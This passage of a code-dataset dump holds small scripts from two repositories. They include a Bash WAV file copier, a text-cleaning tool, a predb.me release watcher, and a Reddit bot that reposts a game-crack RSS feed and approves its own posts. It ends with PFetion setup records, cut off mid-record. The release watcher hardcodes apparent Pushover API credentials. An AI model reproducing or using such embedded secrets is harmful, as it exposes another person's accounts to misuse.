"text": "#!/bin/bash\n\n# FILE COPIER SCRIPT / FILELOCATOR\n# usage: filelocator [location number file] [destination] [optional location number length, default 4]\n#\n# ex: ./filelocator classic-locations.txt /cygdrive/c/test2/ 5\n#\n\n#IFS='\n#'\noIFS=$IFS\nIFS=$'\\n'\nstty cols 100\n\n#location number length – Default 4\nloc_length=${3:-4}\n\n#\"clear screen\nprintf \"\\033c\"\n\necho \"\"\necho -e \"\\e[41m\"\necho -e \"\\e[1mFILE COPIER - Sandrew Metronome \\e[7m#########\"\necho -e \"#########################################\"\necho \"\"\necho \"Location number file: $1\"\necho \"Number of lines:\" $(wc -l < $1)\necho \"\"\necho \"File destination: $2\"\necho -e \"\\e[0m\"\nsleep 3\n\n# Count lines in file \ntotal_lines=$(wc -l < $1)\ncount=1\n\nprint_percent() {\n str=$1\n num=$2\n v=$(printf \"%-${num}s\" \"$str\")\n echo -e \"\\e[104m\"\"${v// /#}\"\"\\e[0m\"\\\\r\n}\n\nfull_percent() {\n str=$1\n num=$2\n v=$(printf \"%-${num}s\" \"$str\")\n echo -ne \"\\e[41m\"\"${v// /#}\"\"\\e[0m\"\\\\r\n}\n\n\nwhile read line; #read each line from the file in the first argument\ndo\n name=$line;\n destination=$2 #second argument is file destination\n folder=${line:0:$loc_length} #folder name is first four digits of location number \n track=${line: -2} #track identifier is last two digits of location number\n folderlocation=\"$(locate -r '/'$folder'$' )\" #search database for folder name, returns full path\n filelocation=\"$(find \"$folderlocation\" -type f -name \"$track*wav\" 2>/dev/null)\" #find specific track inside folder location using track number.\n \n # Create folders in destination – All error messages suppressed \n mkdir $destination/\"$folder\"/ 2>> /dev/null\n mkdir $destination/\"$folder\"/album 2>> /dev/null\n mkdir $destination/log 2>/dev/null\n \n # Give feedback on process \n tput civis\n tput sc\n echo -e \"\\e[1mCopying Folder: \\e[33m$folder\\e[0m, \\e[1mTrack: \\e[91m$track \\e[21m\\e[39m\\e[0m\"\n \n #print current line out of total lines\n echo -e \"\\e[93m\"Current: $count \"/\" $total_lines\n echo -e \"Lines left: \" $(($total_lines-$count))\n echo -e \"\\e[0m\"\n percent=$(printf '%i %i' $count $total_lines | awk '{ pc=100*$1/$2; i=int(pc); print (pc-i<0.5)?i:i+1 }')\n echo $percent\"%\"\n print_percent \"#\" $percent\n full_percent \"#\" 100\n tput rc\n \n (( count++ ))\n \n # Copy file found earlier to specified destination\n cp -ri \"$filelocation\" /cygdrive/c/test2/\"$folder\"/album/ 2>>$destination/log/\"$folder\"-\"$track\".txt\n \n # Delete all log-files that are 0 bytes (non-errors)\n find $destination/log/ -name '*' -size 0 -print0 | xargs -0 rm 2>/dev/null\n \ndone < $1\ntput cnorm\n\necho \"\"\necho \"DONE!\"\necho \"\"\n"
},
{
"alpha_fraction": 0.6005509495735168,
"alphanum_fraction": 0.6184573173522949,
"avg_line_length": 22.576271057128906,
"blob_id": "ed0d8cabd92e7de3904c97a07fcd73bf16d2c3b7",
"content_id": "ea05688346498e2c9ca1c0c7a95f18508232673f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1452,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 59,
"path": "/rlsChecker.py",
"repo_name": "visti/Sandrew",
"src_encoding": "UTF-8",
"text": "import time\r\nimport winsound\r\nimport tkinter.simpledialog as tksd\r\nimport feedparser\r\nimport re\r\nimport os\r\nfrom pushover import Client\r\n\r\n\r\nclient = Client(\"u4a9fk7gyxgz8yb8xngvj9fyuuj673\", api_token=\"a42t226ott7n15yi3brhvoop8bzjad\")\r\n\r\nstartTime = time.clock()\r\n\r\nfeed = feedparser.parse('http://predb.me/?cats=games-pc&rss=1')\r\n\r\nfound_list = []\r\n\r\ndef game_found(result):\r\n if result in found_list:\r\n print(\"Already found: \" + result)\r\n return\r\n else:\r\n print(result + \" exists on predb.me\")\r\n client.send_message(result + \" exists on PreDB.me\", title=\"Game release\")\r\n winsound.Beep(200, 1000)\r\n found_list.append(result)\r\n\r\n\r\ndef main_loop(release):\r\n count = 0\r\n while count < 20:\r\n result = feed['entries'][count].title.split(\"/n\")\r\n count = count + 1\r\n\r\n for game in result:\r\n if re.search(release, game, re.IGNORECASE):\r\n game_found(game)\r\n\r\n\r\ndef getUptime():\r\n timeSeconds = time.clock() - startTime\r\n timeMinutes = timeSeconds / 60\r\n humanTime = str(round(timeMinutes, 0))\r\n print(\"Time Elapsed: \" + humanTime + \" Minutes\")\r\n return\r\n\r\n# GUI Drawing + Focus settings\r\nroot = tksd.Tk()\r\nroot.withdraw()\r\nroot.lift()\r\nroot.focus_force()\r\n\r\nrelease = tksd.askstring(\"Release\", \"search for release:\")\r\nwhile True:\r\n os.system(\"cls\")\r\n print(\"Searching for \" + release.upper())\r\n getUptime()\r\n main_loop(release)\r\n time.sleep(60)\r\n\r\n"
},
{
"alpha_fraction": 0.5007309913635254,
"alphanum_fraction": 0.5029239654541016,
"avg_line_length": 31.571428298950195,
"blob_id": "d7393cbf1311d4572b15773bb8e120c08f6c4a42",
"content_id": "5af3cade525284293037135040d58e59a0dfa110",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1368,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 42,
"path": "/charm.py",
"repo_name": "visti/Sandrew",
"src_encoding": "UTF-8",
"text": "import tkinter\nimport tkinter.filedialog\nimport tkinter.simpledialog\nimport os\n\nprint (\"Choosing File\")\n\n# GUI Drawing + Focus settings\nroot = tkinter.Tk()\nroot.withdraw()\nroot.lift()\nroot.focus_force()\n\n# Choose Original File\noriginal_file = tkinter.filedialog.askopenfilename(title=\"Choose File:\", initialdir=os.curdir)\n\n# Open original file, read into list\nwith open(original_file) as f:\n original_lines = f.read().splitlines()\n\n# Replace bad characters \noriginal_lines = [w.replace('[', \"\") \\\n .replace(']', \" \") \\\n .replace('%', \" \") \\\n .replace('+', \" \") \\\n .replace(\"(\", \" \") \\\n .replace(\")\", \" \") \\\n .replace(\"_\", \" \") for w in original_lines]\n\n# Create output name variable \noutput_file = original_file[:-4] + '_fixed.txt'\n\n\n# Write all lines with newline except last\nwith open(output_file, 'w+', encoding='ANSI') as f:\n for line in original_lines[:-1]:\n f.write(line.strip() + \"\\n\")\n f.write(original_lines[-1].rstrip())\n\n \n# Completion message\ntkinter.messagebox.showinfo(\"Done!\", \"Created file: \\n\" + output_file)\n"
},
{
"alpha_fraction": 0.6043360233306885,
"alphanum_fraction": 0.6131436228752136,
"avg_line_length": 27.365385055541992,
"blob_id": "37219c6291d6e5007fca0013fab3314d87be2cc2",
"content_id": "abc8c8b5fbed5b78a84c2cdc2cc8ce8987de73a5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1476,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 52,
"path": "/post_rss_feed_to_subreddit.py",
"repo_name": "visti/Sandrew",
"src_encoding": "UTF-8",
"text": "import praw\nimport datetime\nimport time\nimport feedparser\n\ndef generate_existing(target_subreddit,existing_posts):\n for submission in target_subreddit.hot(limit=1000):\n existing_posts.append(submission.title)\n return existing_posts\n\ndef main():\n reddit = praw.Reddit(client_id='',\n client_secret='',\n password='',\n username='guitar_remover_bot',\n user_agent='my user agent')\n\n target_subreddit = reddit.subreddit('7330313')\n\n username = 'guitar_remover_bot'\n \n feed = feedparser.parse('http://api.crackwatch.com/rss/cracks.xml')\n\n existing_posts = []\n\n\n\n while True:\n post_link(existing_posts, target_subreddit, username)\n time.sleep(60)\n\n\ndef post_link(existing_posts, target_subreddit, username):\n feed = feedparser.parse('http://api.crackwatch.com/rss/cracks.xml')\n\n generate_existing(target_subreddit,existing_posts)\n\n for post in feed.entries:\n if post.title in existing_posts:\n print(post.title + \" exists!\")\n\n if post.title not in existing_posts:\n print(\"Posting \" + post.title)\n target_subreddit.submit(title=post.title, url=post.link)\n\n for queue_submission in target_subreddit.mod.modqueue(limit=None):\n if queue_submission.author == username:\n queue_submission.mod.approve()\n\n\nif __name__ == '__main__':\n main()\n\n"
}
] | 8 |
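The clean_titles_test.py record above hinges on a single regex rewrite: a trailing ", The" / ", A" / ", An" is moved back to the front of the title. A minimal self-contained sketch of just that transform, using the same pattern as the file; the sample titles here are hypothetical:

import re

# Same pattern as clean_titles_test.py
messy_title_pat = re.compile(r', (The|A|An)$')

def clean_title(song_title):
    # "Matrix, The" -> "The Matrix"; titles without the suffix pass through
    match = messy_title_pat.search(song_title)
    if match:
        return match.group(1) + ' ' + song_title[:match.start()]
    return song_title

# Hypothetical inputs for illustration
for title in ['Matrix, The', 'Clockwork Orange, A', 'Plain Title']:
    print(clean_title(title))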
irfa89/AlgoDS
|
https://github.com/irfa89/AlgoDS
|
1ae1b75a85182c7accc26b601d3a3c43002c64a7
|
c09803cd9627a582b59b04ec985721641af24fef
|
72055786bd899e285e18a2fab19763814f6380b4
|
refs/heads/master
| 2020-04-13T22:50:57.670225 | 2018-12-29T07:54:28 | 2018-12-29T07:54:28 | 163,490,019 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7854785323143005,
"alphanum_fraction": 0.8250824809074402,
"avg_line_length": 17.9375,
"blob_id": "15dbfc1f86c3c82d1f4b7fccc0e52433c10bf795",
"content_id": "7fdbb03acfc6454839845950b60adcbd1f6c30fc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 303,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 16,
"path": "/LinkedList_DS/App.py",
"repo_name": "irfa89/AlgoDS",
"src_encoding": "UTF-8",
"text": "from LinkedList_DS.LinkedList import LinkedList\n\nlinkedList = LinkedList()\n\nlinkedList.insertEnd(12)\nlinkedList.insertEnd(13)\nlinkedList.insertEnd(14)\nlinkedList.insertEnd(7)\nlinkedList.insertEnd(9)\nlinkedList.insertStart(10)\n\nlinkedList.traverseList()\n\nlinkedList.remove(14)\n\nlinkedList.traverseList()\n"
}
] | 1 |
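App.py above imports LinkedList_DS.LinkedList, but that module is not part of this record. A minimal sketch consistent with the four methods App.py calls (insertStart, insertEnd, remove, traverseList); the node layout is an assumption, not the repo's actual implementation:

class Node:
    # Assumed node shape: one payload, one forward pointer
    def __init__(self, data):
        self.data = data
        self.next = None

class LinkedList:
    def __init__(self):
        self.head = None

    def insertStart(self, data):
        node = Node(data)
        node.next = self.head
        self.head = node

    def insertEnd(self, data):
        node = Node(data)
        if self.head is None:
            self.head = node
            return
        current = self.head
        while current.next:
            current = current.next
        current.next = node

    def remove(self, data):
        # Drop the first node holding data, if any
        current, previous = self.head, None
        while current:
            if current.data == data:
                if previous is None:
                    self.head = current.next
                else:
                    previous.next = current.next
                return
            previous, current = current, current.next

    def traverseList(self):
        current = self.head
        while current:
            print(current.data)
            current = current.next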
ashlibaldwin/polls
|
https://github.com/ashlibaldwin/polls
|
09d6e0a76ffe79d778b88f95a801f4ffb6df75f8
|
5ac01f32388a1d21a2621f05d0630eadc6e4f779
|
101e5268a58ed7407e42506aa575f55332ea7909
|
refs/heads/master
| 2021-04-18T23:28:58.861027 | 2019-04-16T03:26:51 | 2019-04-16T03:26:51 | 58,057,009 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.8060606122016907,
"alphanum_fraction": 0.8060606122016907,
"avg_line_length": 22.428571701049805,
"blob_id": "f4ec57775608f71a2f1d647832f22593b17bc241",
"content_id": "883a48bca5ef04631353f73abf56512ae0dea772",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 165,
"license_type": "permissive",
"max_line_length": 43,
"num_lines": 7,
"path": "/gear/admin.py",
"repo_name": "ashlibaldwin/polls",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom .models import List, Item, UserProfile\n\n\nadmin.site.register(UserProfile)\nadmin.site.register(List)\nadmin.site.register(Item)\n\n"
},
{
"alpha_fraction": 0.7319034934043884,
"alphanum_fraction": 0.7319034934043884,
"avg_line_length": 20.941177368164062,
"blob_id": "e24aebd06437d2cbaba756add0dec2a19160d218",
"content_id": "77fb6b13779bd3c4aeb3cf8b30e811b3cbe909cb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 373,
"license_type": "permissive",
"max_line_length": 61,
"num_lines": 17,
"path": "/gearlist/deploy_settings/__init__.py",
"repo_name": "ashlibaldwin/polls",
"src_encoding": "UTF-8",
"text": "import dj_database_url\nfrom ..settings import *\n\nDEBUG = False\nTEMPLATE_DEBUG = DEBUG \nSSLIFY_DISABLE = False\n\nALLOWED_HOSTS = [\n'localhost',\n'.pythonanywhere.com',\n'.mygearroom.com',\n]\n\nSECRET_KEY = get_env_variable(\"SECRET_KEY\")\nEMAIL_HOST_PASSWORD = get_env_variable(\"EMAIL_HOST_PASSWORD\")\ndb_from_env = dj_database_url.config()\nDATABASES[\"default\"].update(db_from_env)\n"
},
{
"alpha_fraction": 0.6289277076721191,
"alphanum_fraction": 0.6304239630699158,
"avg_line_length": 28.04347801208496,
"blob_id": "4205ad61d102cbcc1fc5df8df01456e85ed2d49e",
"content_id": "6179d904f0b58cf4c210fb62a1770f7b35ce7c99",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2005,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 69,
"path": "/gear/forms.py",
"repo_name": "ashlibaldwin/polls",
"src_encoding": "UTF-8",
"text": "from django import forms\nfrom django.contrib.auth.models import User\nfrom .models import List, Item, UserProfile, User\nfrom django.contrib.auth import authenticate\n\n\nclass ListForm(forms.ModelForm):\n\n class Meta:\n model = List\n fields = ('title',)\n exclude = ('user',)\n\n\nclass ItemForm(forms.ModelForm):\n\n class Meta:\n model = Item\n fields = ('title',)\n exclude = ('todo_list',)\n\n\nclass UserForm(forms.ModelForm):\n password = forms.CharField(widget=forms.PasswordInput())\n\n class Meta:\n model = User\n fields = ('username', 'email', 'password')\n\n def clean_email(self):\n email = self.cleaned_data.get('email')\n username = self.cleaned_data.get('username')\n if email and User.objects.filter(email=email).exclude(username=username).count():\n raise forms.ValidationError(u'Email address must be unique.')\n return email\n\n\nclass LoginForm(forms.Form):\n username = forms.CharField(\n max_length=255, \n required=True, \n label='',\n widget=forms.TextInput(attrs={'placeholder': 'username'})\n )\n password = forms.CharField(\n required=True, \n label='',\n widget=forms.PasswordInput(attrs={'placeholder':'password'})\n )\n\n def clean(self):\n username = self.cleaned_data.get('username')\n password = self.cleaned_data.get('password')\n user = authenticate(username=username, password=password)\n if not user or not user.is_active:\n raise forms.ValidationError(\"Sorry, that login was invalid. Please try again.\")\n return self.cleaned_data\n\n def login(self, request):\n username = self.cleaned_data.get('username')\n password = self.cleaned_data.get('password')\n user = authenticate(username=username, password=password)\n return user\n \n\nclass UserProfileForm(forms.ModelForm):\n class Meta:\n model = UserProfile\n fields = ('website', 'picture')\n\n"
},
{
"alpha_fraction": 0.5666666626930237,
"alphanum_fraction": 0.7222222089767456,
"avg_line_length": 19,
"blob_id": "42cbcc80018be121b95118ec82534d2b477a6cb9",
"content_id": "001e3bfbbd0e0bd95ca819b29a6e5d442401bafb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 180,
"license_type": "permissive",
"max_line_length": 28,
"num_lines": 9,
"path": "/requirements.txt",
"repo_name": "ashlibaldwin/polls",
"src_encoding": "UTF-8",
"text": "dj-database-url==0.5.0\nDjango==2.2\ndjango-password-reset==2.0\ndjango-sslify==0.2.7\ndjango-webpack-loader==0.6.0\nmysqlclient==1.4.2.post1\nPillow==6.0.0\npytz==2018.9\nsqlparse==0.3.0\n"
},
{
"alpha_fraction": 0.6828571557998657,
"alphanum_fraction": 0.6828571557998657,
"avg_line_length": 30.81818199157715,
"blob_id": "e4f13b87af963eca12d2e1e01bf984fb6c41abf6",
"content_id": "12e222161204986d8d12558421a6a0ae2c744206",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 350,
"license_type": "permissive",
"max_line_length": 60,
"num_lines": 11,
"path": "/gearlist/urls.py",
"repo_name": "ashlibaldwin/polls",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import url\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\nfrom gear import views\n\nurlpatterns = [\n url(r'^gear/', include('gear.urls', namespace=\"gear\")),\n url(r'^admin/', admin.site.urls),\n url(r'^$', views.home, name='home'),\n url(r'^passwordreset/', include('password_reset.urls')),\n]\n"
},
{
"alpha_fraction": 0.6458852887153625,
"alphanum_fraction": 0.6458852887153625,
"avg_line_length": 32.41666793823242,
"blob_id": "868d82f76507bb5ffea085ca08e5cf27f89d55f5",
"content_id": "472d1d9fe8c1e8f52ef86b922ff481f95f5b02f5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 401,
"license_type": "permissive",
"max_line_length": 97,
"num_lines": 12,
"path": "/gear/templates/gear/delete_list.html",
"repo_name": "ashlibaldwin/polls",
"src_encoding": "UTF-8",
"text": "{% extends 'base.html' %}\n% load staticfiles %}\n{% block content %}\n<div class=\"text-center\">\n\t<strong>Are you sure you want to delete {{ object.title }}?</strong>\n\t<form method=\"post\">\n\t {% csrf_token %}\n\t <button type=\"submit\" class=\"btn btn-danger\">I'm sure</button>\n\t <input class=\"btn btn-info\" type=\"button\" value=\"Nevermind\" onclick=\"window.history.back()\" />\n\t</form>\n</div>\n{% endblock %}\n"
},
{
"alpha_fraction": 0.736213207244873,
"alphanum_fraction": 0.7426470518112183,
"avg_line_length": 30.05714225769043,
"blob_id": "d64ab1452151dcee9e467d620e51d6e8f3a0cbc2",
"content_id": "4ddf519ed80832bbb8532806d6535ce1f1485025",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1088,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 35,
"path": "/gear/models.py",
"repo_name": "ashlibaldwin/polls",
"src_encoding": "UTF-8",
"text": "from __future__ import unicode_literals\n\nfrom django.db import models\nfrom django.utils.encoding import python_2_unicode_compatible\nimport datetime\nfrom django.utils import timezone\nfrom django.urls import reverse\nfrom django.contrib.auth.models import User\n\n\nclass UserProfile(models.Model):\n user = models.OneToOneField(User, related_name='user', on_delete=models.CASCADE)\n website = models.URLField(blank=True)\n picture = models.ImageField(upload_to='profile_images', blank=True)\n\n def __unicode__(self):\n return self.user.username\n\n\nclass List(models.Model): \n title = models.CharField(\"\", max_length=250, unique=False, editable=True) \n user = models.ForeignKey(User, blank=True, on_delete=models.CASCADE)\n \n def __str__(self): \n return self.title\n\n\nclass Item(models.Model): \n title = models.CharField(\"\", max_length=250, unique=False) \n created_date = models.DateTimeField(default=datetime.datetime.now) \n todo_list = models.ForeignKey(List, on_delete=models.CASCADE)\n checked = models.BooleanField(default=False)\n\n def __str__(self): \n return self.title \n"
},
{
"alpha_fraction": 0.7158234715461731,
"alphanum_fraction": 0.7308934330940247,
"avg_line_length": 18.12371063232422,
"blob_id": "c63d63d9a9f3ac537340c803ec84bfa89c28a2ca",
"content_id": "f1aa0675e267fdd70bedc411f60ed14b1fff2bca",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1858,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 97,
"path": "/README.md",
"repo_name": "ashlibaldwin/polls",
"src_encoding": "UTF-8",
"text": "# GearListApp\nDjango app for making lists about stuff\n\n\n#Running locally\n\n### requirements\n- pip\n\n`python3 -m pip install --user --upgrade pip`\n\n- virtual env\n\n`python3 -m pip install --user virtualenv`\n\n\n### steps\n1. Navigate to the project root\n2. start a new virtual environment \n\n`python3 -m virtualenv env`\n\n3. install mysql dmg file from the [MySQL community server](https://dev.mysql.com/downloads/mysql/)\n- once downloaded, double click to open and install the file, follow the prompts\n- start the server\n\n\n4. add the following line to your bash profile:\n\n`export PATH=$PATH:/usr/local/mysql/bin`\n\n5. restart the command line & naviate to the project root\n\n6. drop into mysql shell\n\n`$ mysql -u root -p`\n\n\n7. create the database\n\n`CREATE DATABASE gearlist;`\n\n`CREATE USER 'admin'@'localhost' IDENTIFIED BY 'password1';`\n\n`GRANT ALL PRIVILEGES ON gearlist.* TO 'admin'@'localhost';`\n\n`FLUSH PRIVILEGES;`\n\n`quit`\n\n\n8. Create a superuser\n\n`python manage.py createsuperuser`\n\n\n9. activate the virtual env\n\n`source env/bin/activate`\n\n10. install requirements\n\n`pip install -r requirements.txt`\n\n11. migrate\n\n`python manage.py migrate`\n\n12. start the server:\n\n`python manage.py runserver`\n\nAt this point the server should start and you can view the website locally at http://127.0.0.1:8000/\n\n### Errors & troubleshooting:\n\n- I got error like 'library not loaded, so I did this and it seemed to work:\n\n`export DYLD_LIBRARY_PATH=\"/usr/local/mysql/lib:${DYLD_LIBRARY_PATH}\"`\n\n`export PATH=\"/usr/local/mysql/lib:${PATH}\"`\n\n- if new packages are added, run \n\n`pip install -r requirements.txt`\n\n- sometimes deleting env and creating a new one fixes stuff\n\n- database image not found:\n`export DYLD_LIBRARY_PATH=/usr/local/mysql/lib/`\n\n\n### To start the server next time, from the project root just run\n\n`source env/bin/activate`\n\n`python manage.py runserver`\n\n\n\n"
},
{
"alpha_fraction": 0.6165736317634583,
"alphanum_fraction": 0.6185057759284973,
"avg_line_length": 30.472972869873047,
"blob_id": "332ea42eb8b0c918912e2a60cd224713daa371f2",
"content_id": "566a7812371ccce14c45a5220d66bb354332a13d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4658,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 148,
"path": "/gear/views.py",
"repo_name": "ashlibaldwin/polls",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import get_object_or_404, render\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.urls import reverse, reverse_lazy\nfrom django.views import generic\nfrom django.shortcuts import redirect\nfrom .models import List, Item, UserProfile\nfrom .forms import ItemForm, ListForm, UserProfileForm, UserForm, LoginForm\nfrom django.views.generic.edit import DeleteView # this is the generic view\nfrom django.contrib.auth import authenticate, login\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import logout\nfrom django.contrib.auth.models import User\nfrom django.http import JsonResponse\nimport logging\n\n\ndef home(request):\n return render(request, \"gear/home.html\", {})\n\n\n@login_required\ndef profile(request):\n return render(request, 'gear/profile.html', {})\n\n\n@login_required\ndef list(request):\n username = None\n if not request.user.is_authenticated:\n return HttpResponseRedirect('/')\n\n if request.user.is_authenticated:\n lists = List.objects.filter(user=request.user)\n form = ListForm(request.POST or None)\n if request.method == \"POST\":\n form = ListForm(request.POST)\n if form.is_valid():\n list = form.save(commit=False)\n list.user = request.user\n list.save()\n return redirect('gear:list_detail', pk=list.pk)\n else:\n form = ListForm()\n\n return render(request, 'gear/list.html', {'lists': lists, 'form': form})\n\n@login_required\ndef list_detail(request, pk):\n lists = List.objects.get(user=request.user, pk=pk)\n items =lists.item_set.all()\n form = ItemForm\n if request.method == \"POST\":\n form = ItemForm(request.POST)\n if form.is_valid():\n item = form.save(commit=False)\n item.todo_list = lists\n item.save()\n form = ItemForm\n return redirect('gear:list_detail', pk=pk)\n else:\n form = ItemForm()\n\n return render(request, 'gear/list_detail.html', {'items': items, 'form': form, 'lists':lists})\n\n\ndef update_item(request, item_id):\n if request.method == 'POST': \n obj = Item.objects.get(pk=item_id)\n if obj.checked:\n obj.checked = False\n else:\n obj.checked = True\n \n obj.save()\n return JsonResponse({'result':'ok'})\n else:\n return JsonResponse({'result':'nok'})\n\n\ndef delete_list(request, pk):\n list = get_object_or_404(List, pk=pk)\n if request.method=='POST':\n list.delete()\n return redirect('gear:list')\n\n return render(request, 'gear/delete_list.html', {'object':list})\n\n\ndef delete_item(request, pk):\n item = get_object_or_404(Item, pk=pk)\n if request.method=='POST':\n item.delete()\n list_id = item.todo_list.id\n list_url = \"/gear/list_detail/\" +str(list_id)\n return redirect(list_url)\n \n return render(request, 'gear/delete_item.html', {'object':item})\n\n\ndef register(request):\n registered = False\n if request.method == 'POST':\n user_form = UserForm(data=request.POST)\n profile_form = UserProfileForm(data=request.POST)\n if user_form.is_valid() and profile_form.is_valid():\n user = user_form.save()\n user.set_password(user_form.cleaned_data['password'])\n user.save()\n profile = profile_form.save(commit=False)\n profile.user = user\n\n if 'picture' in request.FILES:\n profile.picture = request.FILES['picture']\n profile.save()\n registered = True\n username = request.POST['username']\n password = request.POST['password']\n login(request, user)\n \n return HttpResponseRedirect(\"/\")\n else:\n print (user_form.errors, profile_form.errors)\n else:\n user_form = UserForm()\n profile_form = UserProfileForm()\n\n return render(request,\n 
'gear/register.html',\n {'user_form': user_form, 'profile_form': profile_form, 'registered': registered})\n\n\ndef user_login(request):\n form = LoginForm(request.POST or None)\n if request.POST and form.is_valid():\n user = form.login(request)\n if user:\n if user.is_active:\n login(request, user)\n return HttpResponseRedirect('/gear/list')\n else:\n return HttpResponse(\"Your account is disabled.\")\n return render(request, 'gear/login.html', {'login_form': form })\n\n\n@login_required\ndef user_logout(request):\n logout(request)\n return HttpResponseRedirect('/')\n"
},
{
"alpha_fraction": 0.6264045238494873,
"alphanum_fraction": 0.6264045238494873,
"avg_line_length": 38.61111068725586,
"blob_id": "986033dcc8efca265b2fe40d87191b69106c964a",
"content_id": "c9d3d5beb9399718bc294ccf7fd6db5c0a349805",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 712,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 18,
"path": "/gear/urls.py",
"repo_name": "ashlibaldwin/polls",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import url\nfrom django.conf.urls import include\n\nfrom . import views\n\napp_name = 'gear'\n\nurlpatterns = [\n url(r'^profile/', views.profile, name='profile'),\n url(r'^list/', views.list, name='list'),\n url(r'^list_detail/(?P<pk>\\d+)/$', views.list_detail, name='list_detail'),\n url(r'^delete/(?P<pk>\\d+)/$', views.delete_item, name=\"delete_item\"),\n url(r'^delete_list/(?P<pk>\\d+)/$', views.delete_list, name=\"delete_list\"),\n url(r'^register/$', views.register, name='register'),\n url(r'^login/$', views.user_login, name='login'),\n url(r'^logout/$', views.user_logout, name='logout'),\n url(r'^update/item/(?P<item_id>\\d+)/$', views.update_item, name=\"update_item\"),\n]"
}
] | 10 |
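The views in the polls record above read items through Django's reverse foreign-key manager (lists.item_set.all()). A short sketch of that relation using the List and Item models as declared in gear/models.py; the user lookup and titles are hypothetical, and it assumes a migrated database with at least one user:

# run inside: python manage.py shell
from django.contrib.auth.models import User
from gear.models import List, Item

user = User.objects.first()  # hypothetical existing user
camping = List.objects.create(title='Camping', user=user)
Item.objects.create(title='Tent', todo_list=camping)
Item.objects.create(title='Stove', todo_list=camping)

# the same reverse relation views.list_detail uses:
for item in camping.item_set.all():
    print(item.title, item.checked)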
jackey/PFetion
|
https://github.com/jackey/PFetion
|
27a8f9723468c836df6576d15648d7590fe4101e
|
860d16f43137c2f13e863ffc6000456c2397616e
|
bcc12022ad7ca148eff3938d1690ae03aea36563
|
refs/heads/master
| 2020-12-25T14:05:51.213755 | 2013-10-15T08:49:07 | 2013-10-15T08:49:07 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5659751296043396,
"alphanum_fraction": 0.5734440088272095,
"avg_line_length": 33.382354736328125,
"blob_id": "7993e7b9a5b711d5c22f516aa28c17316c5a801a",
"content_id": "944785701b5496e914be4d3a1920db96173eea82",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1207,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 34,
"path": "/setup.py",
"repo_name": "jackey/PFetion",
"src_encoding": "UTF-8",
"text": "#coding=utf-8\r\nfrom setuptools import setup\r\nimport PFetion\r\n\r\nsetup(\r\n name = PFetion.__name__,\r\n version = PFetion.__version__,\r\n packages = ['PFetion'],\r\n keywords = 'library mobile fetion',\r\n author = PFetion.__author__,\r\n author_email = '[email protected]',\r\n\r\n url = PFetion.__website__,\r\n description = 'A simple python lib for WapFetion',\r\n long_description = open(\"README.md\").read(),\r\n license = PFetion.__license__,\r\n classifiers = [\r\n 'Development Status :: 4 - Beta',\r\n 'Environment :: Console',\r\n 'Intended Audience :: Developers',\r\n 'License :: OSI Approved :: MIT License',\r\n 'Natural Language :: English',\r\n 'Natural Language :: Chinese (Simplified)',\r\n 'Operating System :: OS Independent',\r\n 'Programming Language :: Python :: 2',\r\n 'Programming Language :: Python :: 2.5',\r\n 'Programming Language :: Python :: 2.6',\r\n 'Programming Language :: Python :: 2.7',\r\n 'Topic :: Internet :: WWW/HTTP :: Dynamic Content :: CGI Tools/Libraries',\r\n 'Topic :: Utilities',\r\n 'Topic :: Software Development :: Libraries :: Python Modules',\r\n ],\r\n zip_safe = False,\r\n)\r\n\r\n"
},
{
"alpha_fraction": 0.649193525314331,
"alphanum_fraction": 0.7177419066429138,
"avg_line_length": 21.545454025268555,
"blob_id": "fdef912f71c5a5498ec8d9cc8dd3ee33cea89c57",
"content_id": "b6c061f5671f0fa09b8177ba4f0eae7b4d756341",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 248,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 11,
"path": "/bin/sms.py",
"repo_name": "jackey/PFetion",
"src_encoding": "UTF-8",
